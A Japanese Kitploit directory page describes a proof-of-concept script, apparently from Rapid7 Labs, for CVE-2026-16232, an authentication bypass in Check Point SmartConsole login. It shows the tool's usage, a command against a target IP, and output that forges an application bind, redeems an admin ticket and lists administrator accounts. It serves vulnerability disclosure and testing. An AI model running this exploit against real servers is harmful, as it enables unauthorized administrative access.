Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-16232 — アプリケーショントークンを使用した SmartConsole ログインプロセスにおける認証バイパス(CVE-2026-16232)を悪用する概念実証スクリプト。 | Kitploit
ツール/GitHubGitHub/sfewer-r7/cve-2026-16232
認証と認可脆弱性分析エクスプロイトペネトレーションテスト
GitHubsfewer-r7/cve-2026-16232

CVE-2026-16232

アプリケーショントークンを使用した SmartConsole ログインプロセスにおける認証バイパス(CVE-2026-16232)を悪用する概念実証スクリプト。

リポジトリを見る
11751ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-16232

概要

これは、アプリケーショントークンを使用した SmartConsole ログインプロセスにおける認証バイパスである CVE-2026-16232 を悪用する概念実証スクリプトです。この脆弱性は、Check Point Security Management Server および Multi-Domain Security Management Server (MDS) に影響します。

完全な技術分析については、Rapid7 Analysis を参照してください。

使用方法

root@kitploit:~
$ python3 CVE-2026-16232.py --help
usage: CVE-2026-16232.py [-h] --target TARGET [--fwm-port FWM_PORT] [--cpm-port CPM_PORT] [--timeout TIMEOUT]

Demonstrate CVE-2026-16232 by forging an application bind and redeeming a SmartConsole admin ticket.

options:
  -h, --help           show this help message and exit
  --target TARGET      management server hostname or IP
  --fwm-port FWM_PORT  SIC/CPMI port (default: 18190)
  --cpm-port CPM_PORT  CPM SOAP port (default: 19009)
  --timeout TIMEOUT    network timeout in seconds (default: 10)

使用例

脆弱なターゲットに対して PoC を実行すると、認証バイパスが機能していることがわかります。

root@kitploit:~
$ python3 CVE-2026-16232.py --target 192.168.86.15
===============================================================================================
Rapid7 Labs - Check Point authentication bypass via SmartConsole login process (CVE-2026-16232)
===============================================================================================
[+] Targeting: 192.168.86.15
[+] SIC/CPMI connected
[+] Forged application DN: cn=cp_mgmt,o=gw-5622ca..5otbwa
[+] Application bind succeeded
[+] Application token obtained: XYB8PbLoXXnMx4J7W43UK-BhrjWkolvihp0P98G2qDc
[+] getServerInfo
    hostName: gw-5622ca
    hostIpAddress: 192.168.86.15
    osName: Linux
    osVersion: 3.10.0-1160.15.2cpx86_64
[+] Application token GetAllAdmins count: 0
[+] SmartConsole application-token ticket redeemed: 31bd621cc8855634fd97484fec258a18eb14eb8feb14b22c260a4accba715808
[+] GetAllAdmins count: 6
    admin: UNIX_PASSWORD
    Remote CPM Server_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    upgrade_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    admin_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    SmartView Reporter Client_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD
    CPM Server_cn=cp_mgmt,o=gw-5622ca..5otbwa: INTERNAL_PASSWORD

パッチ適用済みのターゲットに対して PoC を実行すると、悪意のあるアプリケーションバインド要求が失敗することがわかります。

root@kitploit:~
$ python3 CVE-2026-16232.py --target 192.168.86.16
===============================================================================================
Rapid7 Labs - Check Point authentication bypass via SmartConsole login process (CVE-2026-16232)
===============================================================================================
[+] Targeting: 192.168.86.16
[+] SIC/CPMI connected
[+] Forged application DN: cn=cp_mgmt,o=gw-5622cc..tmbpin
[-] Application bind failed. The target is likely patched and not vulnerable.
ツールをダウンロード